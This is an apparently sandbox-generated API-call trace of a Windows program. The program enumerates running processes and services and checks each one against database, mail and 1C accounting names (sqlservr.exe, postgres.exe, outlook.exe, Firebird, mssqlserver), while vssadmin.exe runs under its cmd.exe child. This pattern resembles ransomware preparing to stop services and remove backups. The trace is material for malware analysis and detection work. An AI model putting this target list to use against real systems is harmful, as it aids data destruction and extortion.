	[0137.714] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0137.714] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0137.714] lstrlenW (lpString="Spooler") returned 7
	[0137.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0137.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0137.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0137.714] lstrlenW (lpString="Themes") returned 6
	[0137.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0137.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0137.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0137.714] lstrlenW (lpString="UxSms") returned 5
	[0137.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0137.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0137.714] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0137.715] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0137.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0137.715] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb564d98 | out: hHeap=0x7ab0000) returned 1
	[0137.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x298
	[0137.717] Process32FirstW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0137.717] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0137.717] lstrlenW (lpString="System") returned 6
	[0137.717] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0137.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0137.717] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0137.717] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0137.717] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0137.717] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0137.717] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0137.717] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0137.718] lstrlenW (lpString="smss.exe") returned 8
	[0137.718] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0137.718] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0137.718] lstrlenW (lpString="csrss.exe") returned 9
	[0137.718] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0137.718] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0137.718] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0137.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0137.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0137.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0137.718] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0137.719] lstrlenW (lpString="wininit.exe") returned 11
	[0137.719] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0137.719] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0137.719] lstrlenW (lpString="csrss.exe") returned 9
	[0137.719] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0137.719] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0137.719] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0137.719] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0137.719] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0137.719] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0137.719] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0137.720] lstrlenW (lpString="winlogon.exe") returned 12
	[0137.720] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0137.720] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0137.720] lstrlenW (lpString="services.exe") returned 12
	[0137.720] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0137.720] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0137.720] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0137.721] lstrlenW (lpString="lsass.exe") returned 9
	[0137.721] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0137.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0137.721] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0137.721] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0137.721] lstrlenW (lpString="lsm.exe") returned 7
	[0137.721] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0137.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0137.721] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0137.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0137.721] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.722] lstrlenW (lpString="svchost.exe") returned 11
	[0137.722] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0137.722] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.722] lstrlenW (lpString="svchost.exe") returned 11
	[0137.722] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0137.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0137.723] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.723] lstrlenW (lpString="svchost.exe") returned 11
	[0137.723] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0137.723] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.723] lstrlenW (lpString="svchost.exe") returned 11
	[0137.723] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0137.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0137.724] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0137.724] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.724] lstrlenW (lpString="svchost.exe") returned 11
	[0137.724] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0137.724] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0137.724] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0137.724] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0137.724] lstrlenW (lpString="audiodg.exe") returned 11
	[0137.724] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.725] lstrlenW (lpString="svchost.exe") returned 11
	[0137.725] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.725] lstrlenW (lpString="svchost.exe") returned 11
	[0137.725] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0137.725] lstrlenW (lpString="spoolsv.exe") returned 11
	[0137.725] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0137.726] lstrlenW (lpString="svchost.exe") returned 11
	[0137.726] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0137.726] lstrlenW (lpString="taskhost.exe") returned 12
	[0137.726] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0137.726] lstrlenW (lpString="userinit.exe") returned 12
	[0137.726] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0137.726] lstrlenW (lpString="dwm.exe") returned 7
	[0137.727] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0137.727] lstrlenW (lpString="explorer.exe") returned 12
	[0137.727] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0137.727] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0137.727] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0137.727] lstrlenW (lpString="dllhost.exe") returned 11
	[0137.727] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0137.728] lstrlenW (lpString="reader_sl.exe") returned 13
	[0137.728] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0137.728] lstrlenW (lpString="cmd.exe") returned 7
	[0137.728] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0137.728] lstrlenW (lpString="conhost.exe") returned 11
	[0137.728] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0137.729] lstrlenW (lpString="vssadmin.exe") returned 12
	[0137.729] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0137.729] CloseHandle (hObject=0x298) returned 1
	[0137.729] Sleep (dwMilliseconds=0x1f4) 
	[0138.366] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7b637b0
	[0138.403] EnumServicesStatusExW (in: hSCManager=0x7b637b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0138.404] GetLastError () returned 0xea
	[0138.404] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb61f938
	[0138.404] EnumServicesStatusExW (in: hSCManager=0x7b637b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb61f938, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb61f938, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0138.404] CloseServiceHandle (hSCObject=0x7b637b0) returned 1
	[0138.404] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0138.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0138.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0138.404] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0138.404] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0138.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0138.404] lstrlenW (lpString="AudioSrv") returned 8
	[0138.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0138.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0138.405] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0138.405] lstrlenW (lpString="BFE") returned 3
	[0138.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0138.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0138.405] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0138.405] lstrlenW (lpString="CryptSvc") returned 8
	[0138.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0138.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0138.405] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0138.405] lstrlenW (lpString="CscService") returned 10
	[0138.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0138.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0138.405] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0138.405] lstrlenW (lpString="DcomLaunch") returned 10
	[0138.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0138.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0138.405] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0138.405] lstrlenW (lpString="Dhcp") returned 4
	[0138.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0138.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0138.405] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0138.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0138.406] lstrlenW (lpString="Dnscache") returned 8
	[0138.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0138.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0138.406] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0138.406] lstrlenW (lpString="DPS") returned 3
	[0138.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0138.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0138.406] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0138.406] lstrlenW (lpString="eventlog") returned 8
